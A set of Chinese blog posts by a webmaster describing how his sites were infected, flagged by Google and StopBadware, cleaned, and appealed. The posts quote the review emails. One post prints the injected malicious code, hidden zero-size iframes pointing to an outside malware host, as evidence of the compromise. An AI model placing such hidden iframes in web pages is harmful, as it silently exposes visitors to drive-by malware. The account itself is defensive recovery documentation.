Firefox3与stopbadware的结合


自firefox升级到2.0后,我大部分时间使用Firefox浏览网页,最近升级到3.0,除了部分扩展不能使用之外,其它方面均感觉很满意。
今天搜索“电子商务”一词,看到张智勇先生的电子商务加油站,就想进去看看有木有新东西,结果点击过后,出现一个全新画面。

上面写到:

已报告的攻击站点!
位于 echere.com 的站点已经被报告为攻击网站,而且已根据您的安全首选项而阻止。
攻击站点会安装用于盗窃隐私信息的程序,或使用您的计算机来攻击其他人,或者损坏您的系统。
某些攻击站点故意发布有害软件,但是许多都没有在获得用户允许或者了解的情况下进行。

想看看源码,也没看成。
切换到IE下看看,页面下载,到页尾时挺慢的,就要完成时,弹出了6.cn的大窗口,IE死掉了。
看看HTML源码(我也就会这个),在页尾部分,江湖中相当流行的暗器如下:

逃离stopbadware(三)


今天早晨我很开心的发现,在google的搜索结果中,igowu.cn的相关页面标题已经去除了”该网站可能会损害你的计算机”字样;效率很高。

同时也收到了stopbadware对googlefans.net审核不通过的邮件,摘要如下:
“According to our review of your website, your site hosts or distributes badware. For example, Packer attempts to install when users visit http://www.googlefans.net/blog/user.asp?id=57. ”
在例如“http://www.googlefans.net/blog/user.asp?id=57”的页面中,依然存在恶意软件。不像初次那样固执,这回我乖乖使用UE批量查找< iframe src=”*” width=* height=* >< /iframe >替换,结果不出所料,出来三段恶意代码。

再次到stopbadware提交申请,1小时不到就再次收到邮件。
Thank you for contacting StopBadware.org. We are currently re-reviewing a number of websites via our request for review process, and we have added your site to that testing queue.

待googlefans.net也逃离stopbadware后,我会就这次事件做个总结。

ps.最近在看《越狱》第二季

逃离stopbadware(二)

stopbdware.org回信了…
We have received and processed your request for review of your website, www.igowu.cn/. It appears that your site does not currently host or distribute badware. As such, the Google warning page for your site has either already been removed or should be removed shortly. In addition, if your site has been listed in our Badware Website Clearinghouse, we will be removing your site from the Clearinghouse list.

Sometimes website owners are confused about why Google placed a warning in the search results for their site. In many cases, a website run by an innocent site owner has been hacked by a malicious third party, causing the site to distribute badware without the site owner’s knowledge. If your site was distributing badware because it has been hacked, then simply removing the bad code from your site is not enough to keep your site clean in the future. You will also need to work with your hosting provider to fix all security vulnerabilities associated with your site.

Please note that we will be retesting your website at periodic intervals in order to monitor that it remains free from badware. If we find that you are hosting or distributing badware in the future, the reviews process may take considerably longer than the original review.

Answers to commonly asked questions from site owners who are the subject of Google warnings can be found at: http://stopbadware.org/home/faq#partnerwarnings
For tips on keeping your website clean and secure, please visit: http://stopbadware.org/home/security

The StopBadware Team

逃离stopbadware(一)


上次按google的方法提交了网站,迟迟没有效果。于是使用另外一个办法,直接给stopbadware.org写了个邮件,中文的。
“hi,你们好:
我是http://www.googlefans.net,http://www.igowu.cn/的站长,前段时间,我的网站被木马入侵,被打上了”stop
bad ware”的标记。经过仔细检查,目前所有网页已经清除木马,恢复健康的状态。
请再次检查我的网站,作出正确判断。
谢谢”

回复很快(顺便表扬一下feedburner.com的客户服务,邮件回的也相当快,绝对不是机器自动回复),大意是已经不接受邮件形式的申诉,要申诉就要到网站去。
“StopBadware.org no longer accepts appeals submitted via email. If you would like us to review the inclusion of your site in the Badware Website Clearinghouse, please go to http://stopbadware.org/home/review to fill out a Request for Review form.”

点击链接到了http://stopbadware.org/home/review,在下面的文本框中填写你的网址,点击“search cleaninghouse”查找。如果找不到,尝试填写部分网址再搜。
在搜索结果中,点击你的网址:

在进入的新页面填写如下信息

继续

填写后提交,在弹出的窗口选择确定,出现http://stopbadware.org/home/thanks,申诉完毕。

填写的邮箱中会收到来自stopbadware的邮件。
Thank you for contacting StopBadware.org. We are currently re-reviewing a number of websites via our request for review process, and we have added your site to that testing queue.

If at a later time you would like to send us additional information regarding the website you have just submitted for review, please DO NOT reply to this email. Instead, return to your site’s page in the Badware Website Clearinghouse and click on the “Request a Review / Add Additional Comments” button to fill out an additional comments form. Only comments that are submitted via the “Request a Review / Add Additional Comments” form will reach us.

请记住,申诉的前提是你确定你的网站已经没有任何恶意插件!

stopbadware带来的负面影响

一、几个被判定为stopbadware的网站PR值从4或3降到2;

二、从google过来的流量下降70%;

没人会愿意冒险点击一个被标注了“This site may harm your computer.”或“该网站可能会损害您的计算机。”的链接;

三、被链接的windygirl中文网,也受了影响,在google的排名从第一位下降到末一位;

木马已经清除,通过google webmaster工具也提交了,只有耐心等待。

————————————————

为曾经违反网站管理员指南的网站申请重新加入

* 我确信此网站在过去曾违反了 Google 的质量指南。
* 此网站不再违反 Google 的质量指南。
* 我已阅读并同意遵守 Google 的质量指南。

请在重新评估期间耐心等候几周。很遗憾,我们无法单独回复重新加入申请。

pp.900666木马入侵

感谢网友xfeng的提醒,googlefans.net的首页,../blog/,被植入以下代码:

< iframe src=http://pp.900666.com/c.htm width=0 height=0>
< iframe src=http://pp.900666.com/c.htm width=0 height=0>

经查看,在同一台服务器上运行的其它主页,像igowu.cn,igowu.cn/blog/均感染该木马,目前尚不知道该木马会有什么危害,stopbadware是我所知道的第一个麻烦。
我手动查找,逐个删除,然后按照google的邮件提醒操作。

“登录 https:/www.google.com/webmasters/sitemaps/reinclusion?hl=zh-CN,选择”请求重新加入”链接,添加您的网站. 请加注“反malware组”。”
等待google重新对我的网站进行评价。

google上能找到的该木马资料如下:
由于我们托管在电信idc中心机房的服务器所在的网段中有一台其它公司的服务器中了病毒,这台中病毒的电脑以arp欺骗形式欺骗同一网段中所有服务器的正确的网关地址,以至于通过错误网关地址出站的页面都被加入代码(这些代码实际上是不存在于我们服务器上的),现在我们已经解决了这个问题,由此给你带来的影响我们深表歉意,希望能给予我们更多的理解,我们将在今后更扎实的做好服务器安全工作。
http://bbs.51.la/archiver/tid-47637.html

之前说了,检查得那么仔细,被挂马,肯定不是我的网站程序问题,根本就是机房那边存在arp欺骗。今早上咨询网站(www.nnask.com)无法访问,估计就是服务器进行维护了,果然,1个多小时后,网站恢复正常,木马也没有了。
http://www.gxnote.com/?1/action_viewspace_itemid_4980.html

www.getbbs.com下属的某论坛被挂马分析(非完整版本),分析的比较详细的一篇文章
http://blog.sina.com.cn/u/56b798f80100087a

Google更多关于该病毒的内容>>

收到google(谷歌)的来信

这意味着一个好的开始,google(谷歌)主动和我沟通,来共同解决问题。
我很高兴,在这封邮件之后,我或者能够从google(谷歌)的搜索结果中去除那个可恶的(stopbadware)。
------------------------
尊敬的googlefans.net网站管理员:

我们在收录贵网站的时候,发现贵网站可能受到了黑客的攻击。为了保证我们的搜索质量,我们已经在搜索结果中标明”该网站可能会损害您的计算机”。

具体地,我们在贵网站发现了以下问题:
如果在Windows操作系统中访问你们的网站,用户的计算机可能受损.

我们非常欢迎贵网站,如果贵网站希望我们移去警告性语句,请检查你的网站,然后登录 https:/www.google.com/webmasters/sitemaps/reinclusion?hl=zh-CN,选择”请求重新加入”链接,添加您的网站. 请加注“反malware组”。
此致

Google(谷歌)搜索质量组

小心你的网站被stopbadware


从前只听说过,如今身受其害,莫明其妙的,google竟然给我的网页摘要打个“该网站可能会损害您的计算机。”的烙印,这是哪个网站管理者也不愿意接受的。况且我是清白的。
google凭什么认定我的网站有害呢?原因木有说明。
还有google判定的问题,为什么又要站长找StopBadware.org申诉??

并不是我一个提出类似的疑问,google一下,可以找到N多相关结果。比如下面的:
Google 错误地将我的网站提示为”该网站可能会损害您的计算机”,请解决!!!
Google发布网站“恶意软件”警告引发争议
谷歌(google)你这样算不算作恶?

------------------来自google的说明----------------
为什么有些搜索结果会显示“这个网站有可能会损害您的计算机“?

该警告信息会显示在我们认为可能会包含恶意软件的搜索结果中。我们希望用户在搜索网页时感觉更安全;为了增强对用户的保护,我们一直不懈努力于确认这种危险网站。

恶意软件通常是在您访问这些站点时,在您毫不知情或未经您允许的情况下被安装的。恶意软件的例子包括在您的计算机里删除数据;盗窃密码和信用卡号等一系列的个人信息;或者更换您的搜索结果。如想了解更多关于这种类型站点的信息,请您访问 http://www.stopbadware.org/home/help

如果您担心您的计算机上已经安装了恶意软件,请访问 http://www.google.com/support/bin/answer.py?answer=8091 ;在这里您可以获得如何从您的系统里删除恶意软件的信息。

如要了解如何举报某网站违反了我们的网站管理员指南,请您访问 http://www.google.com/support/bin/answer.py?answer=16162

如果您是已由我们确认站点的管理员,请访问 http://www.google.com/support/webmasters/bin/answer.py?answer=45432

--------------解决办法-------------
我的网站被误认为是传播恶意软件的网站。该如何纠正?

所有申诉均由 StopBadware.org 处理。请向 appeals@stopbadware.org 发送电子邮件,陈述您认为网站被误解的理由。他们会进行调查,并就调查结果与您联系。如果判定您的网站没有传播恶意软件,他们就会通知 Google,再由 Google 从搜索结果中删除该识别标记。